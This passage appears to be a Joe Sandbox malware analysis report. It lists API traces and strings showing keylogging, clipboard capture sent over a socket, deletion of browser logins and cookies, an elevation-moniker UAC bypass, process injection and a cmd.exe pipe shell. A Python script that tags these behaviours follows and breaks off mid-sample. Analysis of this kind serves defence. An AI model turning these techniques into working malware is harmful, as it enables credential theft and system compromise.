                                                                                                                          • Part of subcall function 02953519: EnterCriticalSection.KERNEL32(02990D18,02995B70,02995BF0,?,0292179E,02995BF0), ref: 02953524
                                                                                                                          • Part of subcall function 02953519: LeaveCriticalSection.KERNEL32(02990D18,?,0292179E,02995BF0), ref: 02953561
                                                                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 0292523F
                                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02925264
                                                                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 02925291
                                                                                                                          • Part of subcall function 029538A5: __onexit.LIBCMT ref: 029538AB
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,02993F98,02985570,00000062,02985554), ref: 0292538E
                                                                                                                        • Sleep.KERNEL32(00000064,00000062,02985554), ref: 029253A8
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 029253C1
                                                                                                                        • CloseHandle.KERNEL32 ref: 029253CD
                                                                                                                        • CloseHandle.KERNEL32 ref: 029253D5
                                                                                                                        • CloseHandle.KERNEL32 ref: 029253E7
                                                                                                                        • CloseHandle.KERNEL32 ref: 029253EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                         • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                        • String ID: SystemDrive$cmd.exe
                                                                                                                        • API String ID: 3815868655-3633465311
                                                                                                                        • Opcode ID: b9fc87444b57ed494da217c767ed7e4a61548b4bc69cbc75260c0b0ef23d707b
                                                                                                                        • Instruction ID: e37786f0cf96dd1185ecf8a3e1765151dbbe454eacdc653d02042dd963422d70
                                                                                                                        • Opcode Fuzzy Hash: b9fc87444b57ed494da217c767ed7e4a61548b4bc69cbc75260c0b0ef23d707b
                                                                                                                        • Instruction Fuzzy Hash: C291D871A48315AFD705BB68ED4093F779AABC0360FC2082DF95AA6195EF605C1CCF61
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0292B3B4
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0292B3CE
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0292B4F1
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0292B517
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                         • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                        • API String ID: 1164774033-3681987949
                                                                                                                        • Opcode ID: c26075c42ffa22f397b9c4d7faca505939aebd9bfcacd131a6d54bbbfa95a543
                                                                                                                        • Instruction ID: 570ccc1fd990e02e057dedf719454188a7fb4f269ce256d3bdf554b74dd38343
                                                                                                                        • Opcode Fuzzy Hash: c26075c42ffa22f397b9c4d7faca505939aebd9bfcacd131a6d54bbbfa95a543
                                                                                                                        • Instruction Fuzzy Hash: 62517231D041295BDB14FBB0EC65EED777ABFA0324F440069E40AA20D9EF706A5DCE95
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0292B5B2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0292B5CC
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0292B68C
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0292B6B2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0292B6D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                         • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$Close$File$FirstNext
                                                                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                        • API String ID: 3527384056-432212279
                                                                                                                        • Opcode ID: 4360ef60dd6c0be687d361762c2e729920f3bcf5443da40128087c20491ff643
                                                                                                                        • Instruction ID: 4f6c3fa57881004e535525ae60ecef52c06d634f4f2b78ab51bcc0afa2eadcad
                                                                                                                        • Opcode Fuzzy Hash: 4360ef60dd6c0be687d361762c2e729920f3bcf5443da40128087c20491ff643
                                                                                                                        • Instruction Fuzzy Hash: 494190319042295BDB14FBB0EC65EFD776EAFA1324F450029E406A3089EF705A5DCE95
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32 ref: 029359C7
                                                                                                                        • EmptyClipboard.USER32 ref: 029359D5
                                                                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 029359F5
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 029359FE
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02935A34
                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 02935A3D
                                                                                                                        • CloseClipboard.USER32 ref: 02935A5A
                                                                                                                        • OpenClipboard.USER32 ref: 02935A61
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 02935A71
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 02935A7A
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02935A83
                                                                                                                        • CloseClipboard.USER32 ref: 02935A89
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                         • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3520204547-0
                                                                                                                        • Opcode ID: 008bd2f63373a01c47683dfe0ebb5a79e2d649e35fe59b5af6792b2999e8be07
                                                                                                                        • Instruction ID: 6a422ab42c14c8a14b73ae914e46137f194a12a16ae5c5f4ea614e473f750e7f
                                                                                                                        • Opcode Fuzzy Hash: 008bd2f63373a01c47683dfe0ebb5a79e2d649e35fe59b5af6792b2999e8be07
                                                                                                                        • Instruction Fuzzy Hash: D1216571A442109BD715BBF4EC59AFEB7AAEFD4711F410D2DF80686185EF30481D8B62
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,02994358), ref: 0292E233
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02994358), ref: 0292E25E
                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0292E27A
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0292E2FD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,02994358), ref: 0292E30C
                                                                                                                          • Part of subcall function 029327D5: RegCreateKeyA.ADVAPI32(80000001,00000000,02985554), ref: 029327E3
                                                                                                                          • Part of subcall function 029327D5: RegSetValueExA.KERNELBASE(02985554,000000AF,00000000,00000004,00000001,00000004,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 029327FE
                                                                                                                          • Part of subcall function 029327D5: RegCloseKey.ADVAPI32(02985554,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 02932809
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,02994358), ref: 0292E371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                         • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                        • API String ID: 726551946-1743721670
                                                                                                                        • Opcode ID: 5c16329b9a02a26ed4ad2e5ced5aeb33c4d3ebd135ab666abfd55e6b2a8ed7c7
                                                                                                                        • Instruction ID: 62de1f72b86643dcc2fdff5f49c4e292dc8ee0fd1a5accd58eb40d7cbc95bd51
                                                                                                                        • Opcode Fuzzy Hash: 5c16329b9a02a26ed4ad2e5ced5aeb33c4d3ebd135ab666abfd55e6b2a8ed7c7
                                                                                                                        • Instruction Fuzzy Hash: 62714F315493618BCB14FB60D8A0EEFB7AAAFD1354F40092DE58A43199EF70A91DCF52
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                         • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0$1$2$3$4$5$6$7
                                                                                                                        • API String ID: 0-3177665633
                                                                                                                        • Opcode ID: 77d5cd8aaf056e9258b1366385515ef87f53ca98bdf260518538f1981b039363
                                                                                                                        • Instruction ID: 2106706c9f8d799812741df0b9057b0630ed6efeef011feea19e1ae83e8c7dcb
                                                                                                                        • Opcode Fuzzy Hash: 77d5cd8aaf056e9258b1366385515ef87f53ca98bdf260518538f1981b039363
                                                                                                                        • Instruction Fuzzy Hash: F1616B34508351AEDB06EF20D891FAE7BE6AF85750F40489DF991572E4DB709A0CCB53
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 02926788
                                                                                                                        • CoGetObject.OLE32(?,00000024,029859B0,00000000), ref: 029267E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                         • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object_wcslen
                                                                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                        • API String ID: 240030777-3166923314
                                                                                                                        • Opcode ID: 72cf0fc82651f1442afe9a4ca641ea49a2fb49ab9a1c27585206fcdb6ab6f03b
                                                                                                                        • Instruction ID: e352afdbc85c4d958d56b7f7d8f84675c0642a8145afe36ddf6ba0707d38d2aa
                                                                                                                        • Opcode Fuzzy Hash: 72cf0fc82651f1442afe9a4ca641ea49a2fb49ab9a1c27585206fcdb6ab6f03b
                                                                                                                        • Instruction Fuzzy Hash: 221165B2901228AFEB14F7A4C845AEEB7FDDB84710F96006AE945E3144D7749A0CCF75
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,029948F8), ref: 029398D8
                                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02939927
                                                                                                                        • GetLastError.KERNEL32 ref: 02939935
                                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0293996D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3587775597-0
                                                                                                                        • Opcode ID: bac0daa445bcd5925ce133e950e843206d6a7cc83606e9cf9e2ab4ff50921d7b
                                                                                                                        • Instruction ID: e1c43b892849c9f7002e113b873fb9dbf45aaada3ad87037ce111567bac53403
                                                                                                                        • Opcode Fuzzy Hash: bac0daa445bcd5925ce133e950e843206d6a7cc83606e9cf9e2ab4ff50921d7b
                                                                                                                        • Instruction Fuzzy Hash: D0814A31508310ABD718EB60DC94AAFB7A9AFD4710F50092EF58696194EF70EA19CF92
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02929A01
                                                                                                                        • SetWindowsHookExA.USER32(0000000D,029299D0,00000000), ref: 02929A0F
                                                                                                                        • GetLastError.KERNEL32 ref: 02929A1B
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02929A6B
                                                                                                                        • TranslateMessage.USER32(?), ref: 02929A7A
                                                                                                                        • DispatchMessageA.USER32(?), ref: 02929A85
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                        • String ID: Keylogger initialization failure: error $`#v
                                                                                                                        • API String ID: 3219506041-3226811161
                                                                                                                        • Opcode ID: d9b952eee2ae153c570a625bd447b997f692063abeebc0e0cb161524ab8288e5
                                                                                                                        • Instruction ID: 01f01d5414c87c90cc5c100b531babfa8655d485c571365ba71188890dd4c4b5
                                                                                                                        • Opcode Fuzzy Hash: d9b952eee2ae153c570a625bd447b997f692063abeebc0e0cb161524ab8288e5
                                                                                                                        • Instruction Fuzzy Hash: D511E731944311AFE710BBB99C499BBB7ECEBD4620F50092DF895C2144FF20D918CBA2
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B489
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B4BB
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B529
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B536
                                                                                                                          • Part of subcall function 0293B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B50C
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B561
                                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B568
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,029942E0,029942F8), ref: 0293B570
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B583
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2341273852-0
                                                                                                                        • Opcode ID: a6adbee6ebe5f702445c7ea74a4cf054079ea7db11ab714a7defd7001b184af2
                                                                                                                        • Instruction ID: 4bef675695981ef85a92c49941f285268d6b79888c6c1496bb07e0c04e341773
                                                                                                                        • Opcode Fuzzy Hash: a6adbee6ebe5f702445c7ea74a4cf054079ea7db11ab714a7defd7001b184af2
                                                                                                                        • Instruction Fuzzy Hash: F031647294811C9ADB21DBB0DC5CFEAB7BCAF55308F480995E555D2040EB729788CF24
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 02929B3F
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 02929B4B
                                                                                                                        • GetKeyboardLayout.USER32(00000000), ref: 02929B52
                                                                                                                        • GetKeyState.USER32(00000010), ref: 02929B5C
                                                                                                                        • GetKeyboardState.USER32(?,?,00000000), ref: 02929B67
                                                                                                                        • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 02929B8A
                                                                                                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02929BE3
                                                                                                                        • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 02929C1C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1888522110-0
                                                                                                                        • Opcode ID: 8af8ce005343b78b49756cedb3f3a057655abe03fa1d38a1931d6bdd91bc1996
                                                                                                                        • Instruction ID: 1930eea822dbf7e010660199e4575604a3dcaeb73e588ed2185b14a613b942ac
                                                                                                                        • Opcode Fuzzy Hash: 8af8ce005343b78b49756cedb3f3a057655abe03fa1d38a1931d6bdd91bc1996
                                                                                                                        • Instruction Fuzzy Hash: 153193B2588308AFD701DF94DC84FEBB7ECEB88714F410C2AB645D6190D7B1A55C8BA2
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32 ref: 02935A46
                                                                                                                        • EmptyClipboard.USER32 ref: 02935A54
                                                                                                                        • CloseClipboard.USER32 ref: 02935A5A
                                                                                                                        • OpenClipboard.USER32 ref: 02935A61
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 02935A71
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 02935A7A
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02935A83
                                                                                                                        • CloseClipboard.USER32 ref: 02935A89
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2172192267-0
                                                                                                                        • Opcode ID: 60ff171c2ff101996c3ab4298109a4f46870884ab0a18e938559bd01b497fa25
                                                                                                                        • Instruction ID: a5ac32f97d311a258e63c0ea59bd22b71343615766cb4e7a9fba5cf5a567c7ab
                                                                                                                        • Opcode Fuzzy Hash: 60ff171c2ff101996c3ab4298109a4f46870884ab0a18e938559bd01b497fa25
                                                                                                                        • Instruction Fuzzy Hash: B40192316883109FC210BBF4EC59AFAF7AAEFC0711F41096DE80A86040DF30881D8A52
                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0292B257
                                                                                                                        • GetLastError.KERNEL32 ref: 0292B261
                                                                                                                        Strings
                                                                                                                        • [Chrome StoredLogins not found], xrefs: 0292B27B
                                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0292B222
                                                                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0292B287
                                                                                                                        • UserProfile, xrefs: 0292B227
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                        • API String ID: 2018770650-1062637481
                                                                                                                        • Opcode ID: b98bc3acf2c7d43a78a5aa7272783546f4e2f86c6546d39f95f0cf60e3091c28
                                                                                                                        • Instruction ID: 72ca6d88c0b3308eb5b90b475462f7cccf8593d72cdd1488d44dc31696d7290d
                                                                                                                        • Opcode Fuzzy Hash: b98bc3acf2c7d43a78a5aa7272783546f4e2f86c6546d39f95f0cf60e3091c28
                                                                                                                        • Instruction Fuzzy Hash: 04017D33A80224A7DB04B6B4EC7B8FE3769ADF0218B810119E017531DEFF41491CCAD1
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 02936AC4
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 02936ACB
                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02936ADD
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02936AFC
                                                                                                                        • GetLastError.KERNEL32 ref: 02936B02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                        • API String ID: 3534403312-3733053543
                                                                                                                        • Opcode ID: d2044d047b9db088f3dc971c24c7ca821ad4a189beae487d0e7a4df576c047bb
                                                                                                                        • Instruction ID: 0694b2dbb0b289a2516220519417c2e1f800be211f4e1263d3f90329896cd7e6
                                                                                                                        • Opcode Fuzzy Hash: d2044d047b9db088f3dc971c24c7ca821ad4a189beae487d0e7a4df576c047bb
                                                                                                                        • Instruction Fuzzy Hash: 8FF0D4B5845129BBEB10ABE1DC0DEFFBFBCEF05655F000854B806E2141D6748A18CAB1
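A practitioner reading function blocks like the ones above usually wants the raw hex arguments turned into the Win32 constants that give them meaning: the 0000000D passed to SetWindowsHookExA is WH_KEYBOARD_LL (the low-level keyboard hook behind the "Contains functionality to register a low level keyboard hook" signature), the 0000000D passed to GetClipboardData is CF_UNICODETEXT, and the 0000003B passed to EnumServicesStatusW is SERVICE_WIN32|SERVICE_DRIVER. The script below is an added example, not Joe Sandbox code and not part of this report: it parses the report's "APIs" bullets, decodes those constants and emits one list of behaviour tags per function. The constant tables are standard Win32 values; the sample input is a handful of bullets copied from the keylogger, clipboard, Chrome Login Data, SeShutdownPrivilege and service-enumeration blocks above; the tag wording and the rule set are my own choices.

```python
"""Decode Joe Sandbox "APIs" bullets (as in the function blocks above) into behaviour tags.
Added example, not Joe Sandbox code; the constant tables are standard Win32 values."""
import re
from dataclasses import dataclass

# One bullet, with or without an argument list, including the indented
# "Part of subcall function NNN:" variant.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<dll>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
# Win32 constants behind the raw hex arguments shown in the report.
HOOK_IDS = {0x02: "WH_KEYBOARD", 0x0D: "WH_KEYBOARD_LL", 0x0E: "WH_MOUSE_LL"}
CLIPBOARD_FORMATS = {0x01: "CF_TEXT", 0x0D: "CF_UNICODETEXT"}
SERVICE_TYPES = [(0x30, "SERVICE_WIN32"), (0x0B, "SERVICE_DRIVER")]

@dataclass
class ApiCall:
    api: str
    dll: str
    args: list[str]
    ref: str
    subcall: bool

    def hexarg(self, i):
        """Argument i as an int; None for '?', string arguments or a missing slot."""
        try:
            return int(self.args[i], 16)
        except (IndexError, ValueError):
            return None

def parse_calls(block):
    """Parse every API bullet in one function block; other lines are skipped."""
    calls = []
    for line in block.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(ApiCall(m["api"], m["dll"], args, m["ref"], m["sub"] is not None))
    return calls

def decode_flags(value, table):
    """Name every flag in `table` that is fully set in `value`; '?' for an unresolved value."""
    if value is None:
        return "?"
    names = [name for bit, name in table if value & bit == bit]
    return "|".join(names) or hex(value)

def classify(calls):
    """Behaviour tags for one function, derived from its API sequence and arguments."""
    names = {c.api for c in calls}
    tags = []
    for c in calls:
        if c.api.startswith("SetWindowsHookEx"):
            tags.append("hook installed: " + HOOK_IDS.get(c.hexarg(0), "unknown hook id"))
        elif c.api == "GetClipboardData":
            tags.append("clipboard read: " + CLIPBOARD_FORMATS.get(c.hexarg(0), "?"))
        elif c.api.startswith("LookupPrivilegeValue") and "AdjustTokenPrivileges" in names:
            tags.append("privilege enabled: " + next((a for a in c.args if a.endswith("Privilege")), "?"))
        elif c.api.startswith("DeleteFile") and any("Login Data" in a for a in c.args):
            tags.append("browser credential store deleted: " + c.args[-1])
        elif c.api == "EnumServicesStatusW":
            tags.append("service enumeration: " + decode_flags(c.hexarg(1), SERVICE_TYPES))
    if any(c.api == "send" and c.dll == "WS2_32" for c in calls):
        tags.append("result sent over a socket")
    return tags

def analyze(report):
    """Split report text into 'APIs' .. 'Memory Dump Source' blocks and tag each,
    keyed by the ref of the block's first direct (non-subcall) call."""
    results = {}
    for block in re.split(r"^APIs\s*$", report, flags=re.M)[1:]:
        calls = parse_calls(block.split("Memory Dump Source")[0])
        if any(not c.subcall for c in calls):
            results[next(c.ref for c in calls if not c.subcall)] = classify(calls)
    return results

# Constructed input: bullets copied from the function blocks in this report.
SAMPLE_REPORT = """\
APIs
• SetWindowsHookExA.USER32(0000000D,029299D0,00000000), ref: 02929A0F
• GetLastError.KERNEL32 ref: 02929A1B
  • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
Memory Dump Source
APIs
• GetClipboardData.USER32(0000000D), ref: 02935A71
  • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
Memory Dump Source
APIs
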